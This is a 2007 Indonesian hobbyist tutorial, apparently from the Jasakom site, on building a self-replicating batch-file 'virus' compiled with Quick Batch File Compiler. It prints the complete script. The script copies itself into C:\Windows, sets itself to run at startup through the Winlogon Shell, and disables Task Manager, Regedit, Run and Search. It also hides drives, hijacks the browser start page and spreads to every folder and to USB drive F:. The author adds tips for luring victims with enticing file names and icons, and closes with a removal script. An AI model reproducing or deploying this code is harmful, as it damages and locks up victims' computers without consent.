Bikin virus(virusan) pake Quick Batch File Compiler (quick bfc)

Date: Wednesday, January 31, 2007 Hits: 8930 By: ‘fanatiCanz

To the point aja. Setiap kali saya online internet, saya selalu sempatkan diri untuk mampir di situs jasakom ini. Dengan hampir membaca semua artikel yang berhubungan dengan registry dan virus, atas nama logika yang saya punya, saya berhasil membuat sebuah program yang menurut saya layak disebut sebagai virus, walaupun masih virus-virusan. Kenapa saya pede sekali dengan menyebut program ini sebagai virus? Karna program yang saya buat dengan mengunakan software QuickBFC ini, bisa membelah diri (apabila dieksekusi)-bukankah salah satu ciri dari virus adalah dapat menggandakan diri- dan program ini juga masih sanggup untuk menyebar ke flashdisk(atau memory card) yang terdefault ke drive F:\. Jelas layak kan program yang satu ini di sebut sebagai virus(-virusan). Dan program ini juga tidak akan merusak file ataupun menghapusnya, Cuma buat iseng doang ko, cuma main-main diregistry. Oke, karna saya rasa basa-basinya udah kebanyakan mari kita mulai. Tapi sebelumnya saya mau mengucapkan terimakasih dulu buat si tomPLIX yang udah nulis artikel “Bikin Virus Dengan Perintah CMD”, karna program ini adalah pemikiran lanjutan setelah saya baca artikel itu. Dan juga tidak lupa rasa termakasih yang sebesar besarnya buat mas Wardana, R, S. yang udah ngenalin saya dengan pemrograman lewat bukunya; “Pemrograman Virus dan Spyware (uncensored)”, diterbitkan oleh jasakom. Oke di mulai dari apa yang dibutuhkan. Yang dibutuhkan adalah : Software Quick Batch File Compiler (Quickbfc) www.abyssmedia.com (apa gunanya..?: software ini bisa menjadikan file .bat menjadi file .exe (executable). Karna virus yang akan kita buat ini bekerja dengan perintah CMD. Dan ada satu kegunaan software ini lagi, yaitu menyembunyikan jendela console. Jadi file .exe yang dibuat, ketika di run(jalankan) tidak menampilkan jendela console tapi tetap bekerja!! Hebat kan neh software. Software Icon Changer (apa gunanya???: lo ga mau kan virus buatan lo udah di apus duluan karna iconnya aneh dan mencurigakan. Nah, Icon Changer ini diperlukan untuk mencari Icon yang dimiliki oleh Windows, downloadnya di www.shelllabs.com . Kemauan untuk memahami perintah-perintah CMD, Visual Basic Script (VBS) dan ga takut bermain di RegEdit. Oke, semua udah siap. Mari dimulai, jalan kan software Quick bfc, lalu ketik script dibawah ini: @echo off If exist c:\windows\exploler.exe Goto lanjut for %%a in (*.exe) do if %%~za equ 123456 copy "%%a" %systemroot%\exploler.exe copy c:\windows\exploler.exe c:\”rahasia gua”.exe echo on error resume next>c:\windows\gila.vbs echo Dim WshShell, f1, fso, f2>>c:\windows\gila.vbs echo set WshShell = CreateObject("Wscript.Shell")>>c:\windows\gila.vbs echo set fso = CreateObject("Scripting.FileSystemObject")>>c:\windows\gila.vbs echo set f1 = fso.GetFile("C:\WINDOWS\exploler.exe")>>c:\windows\gila.vbs echo set f2=fsoGetFile(“C:\windows\gila.vbs”)>>c:\windows\gila.vbs echo f1.Attributes = "3">>c:\windows\gila.vbs echo f2.Attributes =”3”>>c:\windows\gila.vbs echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD">>c:\windows\gila.vbs echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives", "29", "REG_DWORD">>c:\windows\gila.vbs echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive", "29", "REG_DWORD">>c:\windows\gila.vbs echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryTools", "1", "REG_DWORD">>c:\windows\gila.vbs echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD">>c:\windows\gila.vbs echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD">>c:\windows\gila.vbs echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableTaskMgr", "1", "REG_DWORD">>c:\windows\gila.vbs echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://fanaticanz.blogspot.com", "REG_SZ">>c:\windows\gila.vbs echo WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell", "Explorer.exe C:\WINDOWS\exploler.exe", "REG_SZ">>c:\windows\gila.vbs echo WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "rastaman", "REG_SZ">>c:\windows\gila.vbs echo WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner", "fanatiCanz", "REG_SZ">>c:\windows\gila.vbs :lanjut call c:\windows\gila.vbs if exist c:\legalin_ganja_dong_by_fanatiCanz.exe goto ceki for /R c:\ %%d in (legalin_ganja_dong_by_fanatiCanz.exe) do copy c:\windows\exploler.exe "%%d" Goto ceki :infek1 for %%a in (*.exe) do if %%~za equ 12345 copy "%%a" %systemroot%\exploler.exe Goto ceki :infek2 Copy c:\windows\exploler.exe c:\”gambar lucu”.exe Goto ceki :infek3 Copy c:\windows\exploler.exe f:\”koleksi kartun flash”.exe Goto ceki :cekf if exist f:\”koleksi kartun flash”.exe Goto ceki Goto infek3 :ceki if not exist c:\windows\exploler.exe Goto infek1 if not exist c:\”gambar lucu”.exe Goto infek2 if exist f:\ Goto cekf Goto ceki Waaahhhh……… panjang ya?jangan bilang iya, soale mungkin nanti disaat menjadi programer betulan, 52 baris sih masih sangat amat enteng sekali!!! Mungkin nanti bakalan punya proyek yang jumlahnya ribuan atau mungkin puluhan ribu baris, jadi jangan menyerah Cuma karna 52 baris diatas. Sebetulnya tanpa software quickbfc, masih bisa ko bikin virus(-virusan) ini dan script diatas ditulis dengan menggunakan notepad, lalu di simpan dengan ektensi-nya harus .bat. Dan emang kalo mau nyoba bikin pake notepad trus disimpen dengan ektensi .bat, ada perintah yang bisa diganti, yakni perintah baris ke-3 dan 33 yang “for %%a in dst….” Diganti jadi “copy %0 tujuan dan nama file nya”. Tapi kan kalo nyebarin dengan ektensi .bat kan teramat mencurigakan, mendingan pake quickbfc lalu compile dengan ektensi .exe namanya terserah, contoh:cewe_telanjang.exe (icon nya juga yang sexi, biar lebih mantap), gua yakin para muka mesum akan langsung menjadi korban (heehehe)!!! Dan berdoalah semoga kompie calon korban ngga pake anti virus!. Oke kalo kamu masih sanggup dan masih mau ngebaca tulisan ini, kamu bakalan dapet penjelasan dari script diatas! Dan penjelasannya adalah: Baris Ini Cuma perintah dasar cmd yang tidak akan menampilkan perintah yang harusnya tertulis di console cmd. (dipikir-pikir ngapain juga yach? Kan ini adalah proyek ghost application! Tapi bodo ah!!) Ini perintah untuk mengecek keberadaan file explorer.exe di drive c:\windows. Kalo udah ada kan berarti udah diinfek, dan akan langsung menuju parameter perintah lanjut, tapi kalo belum ada maka akan dilanjutkan ke baris selanjutnya. perintah untuk menyalin program ini ke folder c:\windows dengan nama explorer.exe yang selanjutnya akan menjadi file induk program ini. Sebetulnya kalo dibikinnya pake notepad dan disimpan dengan ektensi .bat maka perintah “for %%a in (*.exe) do if %%~za equ 123456 copy "%%a" %systemroot%\exploler.exe” diganti jadi “copy %0”. Nah, kalo pake software Quickbfc perintah “copy %0” tidak berfungsi. (lengkapnya baca artikel siTomplix yang judulnya Bikin Virus Dengan Perintah CMD) perintah untuk menyalin file explorer.exe di drive c:\windows\ ke drive c:\ dengan nama “rahasia gua.exe perintah di baris ini sampai baris 23 adalah perintah yang menggunakan parameter > dan >> untuk membuat sebuah file Visual Basic Script yang bernama gila.vbs. Disinilah kesaktian program ini, kalau berhasil dieksekusi (kenapa kalau..? ya karna ada beberapa anti virus yang memblok akses ke registry –antivirus yang saya pake ANTIvir, file .vbs ini berjalan mulus –berarti sukses. Tetapi ketika saya coba pake xxxx ada warning dan mempertanyakan file itu boleh dieksekusi atau dihapus atau dikarantin-. Sukur-sukur si calon korban ga make anti virus, tentram damai program ini jalan. Kenapa harus make file Visual Basic Script aja untuk entry ke registry? Jawabannya adalah file Visual Basic Script ini tidak hanya untuk mengisi registry saja. Ada satu lagi fungsi dari virus ini, yaitu mengganti attribute file explorer di drive c:\windows\ menjadi Hidden. Lagian juga kalo ngisi registry pake ektensi .reg bakalan ada pertanyaan “are you sure want to add the information in nama_file.reg to the registry?” ga efisien banget kan? Oke, kembali ke….? Registry. Dan registry yang di isi adalah :  Menghilangkan menu RUN Menyembunyikan drive A, C, D dan E di windows explorer Menyembunyikan semua file di drive A, C, D dan E windows explorer (bakalan ada pembatasan!) Men-disable kan menu RegEdit Menghilangkan menu Folder Option Menghilangkan menu Search Mendisable kan Task Manager (ctrl+alt+del tidak bisa digunakan) Mengganti alamat default Internet Explorer menjadi http://fanaticanz.blogspot.com Menjadikan file exploler.exe di drive c:\windows yang tadi disalin(copy) selalu dijalankan ketika computer di hidupkan lagi walaupun windows masuk ke dalam safe mode! Entry yang ini bakalan merubah nama owner organitation(coba deh kalian klik kanan di my computer trus pilih properties, dan liat di situ ada tulisan "registered to:”) nah, entry yang satu ini akan merubah nama organization yang tadinya apapun menjadi “rastaman” Sama, entry yang satu ini juga merubah nama owner (cek lagi aja di properties my computer) yang tadinya apapun menjadi “fanaticanz” Puh.. selesai juga tentang Registry…. Masih mau lanjut???? lanjut mang…………… kosong ini parameter yang membuat kumpulan perintah yang terdiri dari baris 26 – 28 ini perintah yang akan mengeksekusi file gila di folder c:\windows ini perintah yang mempertanyakan keberadaan file legalin ganja dong by fanatiCanz.exe, jika ada maka akan langsung dirujuk menuju parameter perintah ceki ini perintah untuk menggandakan file induk exploler.exe yang ada di drive C:\windows\ ke seluruh folder dan subfolder yang ada di drive c:\ dengan nama legalin_ganja_dong_by_fanatiCanz.exe ((((thank’s a lot for tomplix)))) ini perintah untuk langsung menuju parameter perintah ceki (baris 47) kosong ini parameter yang membuat kumpulan perintah bernama infek1 yang berisikan perintah dari baris 33 – 34 perintah ini untuk menyalin file program ini dan sedang dijalankan (eksekusi) ke folder c:\windows dengan nama exploler.exe ini perintah yang merujuk langsung ke parameter perintah ceki kosong (untuk mengakhiri kumpulan parameter yang sebelumnya dibuat) parameter yang membuat kumpulan perintah bernama infek2 yang berisikan perintah dari baris 37 – 38. ini perintah untuk menyalin file induk exploler.exe ke drive c:\ dengan nama gambar lucu.exe ini perintah yang langsung merujuk ke perintah ceki kosong (untuk mengakhiri kumpulan parameter yang sebelumnya dibuat) ini parameter yang membuat kumpulan perintah bernama indek3 yang berisikan perintah dari baris 41 – 42 ini perintah untuk menyalin file induk exploler.exe ke drive f:\ dengan nama koleksi kartun flash.exe ini perintah yang merujuk langsung ke parameter perintah ceki kosong (untuk mengakhiri kumpulan parameter yang sebelumnya dibuat) ini parameter yang membuat kumpulan perintah bernama cekf yang berisikan kumpulan perintah dari baris 45-46 ini perintah yang mempertanyakan keberadaan file koleksi kartun flash.exe di drive f:\. Jika tidak maka akan dilanjutkan ke parameter perintah infek3. Tapi jika file terebut sudah ada, itu berarti sudah diinfek maka akan dilanjutkan ke perintah pada baris selanjutnya. ini perintah yang langsung merujuk kepada parameter perintah ceki kosong (untuk mengakhiri kumpulan parameter yang sebelumnya dibuat) ini parameter yang membuat kumpulan perintah bernama ceki yang berisikan kumpulan perintah dari baris 49-51. ini perintah untuk mempertanyakan keberadaan file exploler.exe di drive c:\windows, kalo ga ada itu berarti file induk program ini berhasil (sudah) dihapus, maka akan dilanjutkan ke parameter perintah infek1 dengan perintah yang sama pada baris 3 dan 33. ini perintah untuk mempertanyakan keberadaan file gambar lucu.exe di drive c:\, kalo ga ada maka bakal dilanjutin ke perintah infek2 ini perintah untuk mengetahui ada tidaknya drive f:\ kalo ada maka bakal dilanjutin ke perintah infek3, tapi kali ga ada bakal langsung menuju perintah selanjutnya kosong ini perintah untuk kembali lagi ke parameter perintah ceki, semcam looping lah… Puuhhh………….. akhirnya, 80 baris yang panjang sekali ya penjelasannya (jangan dijawab iya!). Namanya juga belajar, bersusah-susah dululah, nanti bersenang-senang kalau sudah sukses kaya Mas Sto atau Mas Wardana (kedua orang ini walaupun gua ga pernah liat langsung, udah gua anggap suhu! Gapapakan mas ?).Oya buat kamu yang masih kurang mengerti penjelasan script diatas saya saranin agar kamu baca : Buku “Pemrograman Virus dan SpyWare [uncensored]” karya Wardana, R, S.Hut terbitan Jasakom Artikel tomPLIX yang judulnya “Membuat Virus dengan Perintah CMD” di situs jasakom.com semua yang berhubunagn dengan registry Masih pada keukeuh baca tulisan ini, kalau iya, gua kasih script pemulih nya deh sekalian, ga adil dong, masa ngasih penyakitnya doang! (iya ga?) Script Pemulih nya sebagai berikut ; @echo off title Script Pemulih virus-virusan –rasta-Farian.B echo on error resume next>c:\gila.vbs echo Dim WshShell, f1, fso>>c:\gila.vbs echo set WshShell = CreateObject("Wscript.Shell")>>c:\gila.vbs echo set fso = CreateObject("Scripting.FileSystemObject")>>c:\gila.vbs echo set f1 = fso.GetFile("c:\windows\exploler.exe")>>c:\gila.vbs echo set f2 =fso.GetFile(“c:\windows\gila.vbs”) echo f1.Attributes = "0">>c:\gila.vbs echo f2.Attributes = “0”>>c:\gila.vbs echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "0", "REG_DWORD">>c:\gila.vbs echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryTools", "0", "REG_DWORD">>c:\gila.vbs echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrives", "0", "REG_DWORD">>c:\gila.vbs echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "0", "REG_DWORD">>c:\gila.vbs echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "0", "REG_DWORD">>c:\gila.vbs echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableTaskMgr", "0", "REG_DWORD">>c:\gila.vbs echo WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell", "Explorer.exe", "REG_SZ">>c:\gila.vbs call c:\gila.vbs pause Goto del1 kosong :del1 del %systemroot%\exploler.exe pause Goto del2 for /R c:\ %%d in (legalin ganja dong by fanatiCanz.exe) do del "%%d" pause Goto del3 :del3 del c:\"gambar lucu".exe pause :del4 del %systemroot%\gila.vbs pause Ga banyak yang bisa dijelasin dari script diatas, kalo lo mahamin script virus(-virusannya) lo bakalan dengan mudah mengerti script diatas. Dari baris 3 sampe 16 dibikin file gila.vbs yang akan membuat normal semua key yang disebabkan program virus(-virusan) tadi. Terus di baru 17 dieksekusi file gila.vbs dan bakalan langsung menuju perintah del 1 yang berisikan perintah untuk menghapus file induk program tadi. Kalo selesai bakalan dilanjutin ke perintah del2, yang akan menghapus file legalin ganja dong by fanatiCanz.exe di seluruh folder dan seub folder di drive c:\. Terus dilajnutin keperintah selajutnya, dan seterusnya. Script pemulih ini bisa dibuat juga dengan menggunakan notepad lalu simpan dengan extensi .bat. Untuk merasakan khasiat dari script pemulih diatas, jalankan script pemulih tersebut lalu masuk ke dalam Task manager (kan udah dipulihin, jadi task manager udah bisa di control), di dalam menu Process mastikan proses yang namanya, exploler.exe, cmd.exe (end process), setelah semua proses yang namanya CMD.exe, legalin ganja dong by fanatiCanz.exe dan proses exploler.exe dihapus, Jalankan sekali lagi script pemulihnya sampe selesai dan terakhir restart komputernya, dijamin uang kembali, setelah semua “ritual” diatas selesai, computer yang terinfek akan kembali seperti semula. Viva O Muerte!! fanatiCanz thank's to: Tuhan YME, atas ganja dan semua kedamaian di alamNya ( kota tidak termasuk, hanya pantai, gunung, lembah, dan semuanya yang masih murni karya Tuhan) orang-orang yang tulisannya jadi bahan acuan nih artikel : tomPLIX, natans_hacker, Mas Wardana, rename-rename (yang nulis “Anti Deletion File”) dan scarebyte Bequni D GanjaMan –http://sibequni.blogspot.com– (thank's for your spirit and your soul!) ~kenapa hati sama otak jarang banget bisa nyambung, ya? Bokap - Nyokap My lit.Sis ‘n Bro –Putri–Adnan–Asya– (maaf ya, computer kalian harus dibawa dulu) Anisa Agustina –wuih.. hidden spiritnya banyak banget..! makasih, yah! Devi Akhsari –kapan kapan boleh ngobrol…? Barudak Angkasa Pura 2 yang masih setia manggil gua si_bego yang nemuin/nyiptain Internet Wiji Thukul & Che Guevara (karna perjuangannya telah melahirkan semangat juang dalam diri ini!) Iwan Fals & Bob Marley (Sumpah, lirik lagunya banyak nyemangatin gua!!) Dan terimakasih yang sebanyak-banyaknya buat kamu yang udah mau baca tulisan ini sampai huruf terakhir.. hiks..hiks.. (!terharu saya jadinya!) Dan terakhir (lagi lagi terakhir.. ;-), izinkanlah saya untuk membacakan (baca:mengetikan) sebuah puisi karya Wiji Thukul : Kemerdekaan Kemerdekaan mengajarkan aku berbahasa membangun kata-kata dan mengucapkan kepentingan kemerdekaan mengajar aku menuntut dan menulis surat selebaran kemerdekaanlah yang membongkar kuburan ketakutan dan menunjukkan jalan kemerdekaan adalah gerakan yang tak terpatahkan! Kemerdekaan Selalu di garis depan!!  ‘fanatiCanz –rasta-farian.B' Â

Source: JASAKOM Information Center